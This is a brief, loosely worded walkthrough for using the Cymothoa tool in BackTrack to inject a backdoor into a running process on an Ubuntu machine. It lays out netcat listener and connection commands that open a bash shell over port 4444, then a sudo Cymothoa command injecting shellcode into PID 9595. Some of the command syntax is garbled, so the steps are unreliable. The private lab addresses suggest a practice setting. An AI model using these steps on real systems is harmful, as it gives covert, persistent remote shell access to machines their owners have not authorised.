open cymothoa in backtrack with type cd /pentest/backdoors/cymothoa/

and you type ps ax

and you type  nc -l -v -p 4444 -e > cy /bin/bash in backtrack

after you type in ubuntu nc 192.168.56.1 4444
then ls to see what's inside
and you type ./cymothoa to entry

and you type ps ax to see what's inside in ubuntu

and you inject (PID 9595) type the command
you type sudo ./cymothoa -p 9595 -s 0 -y 4444
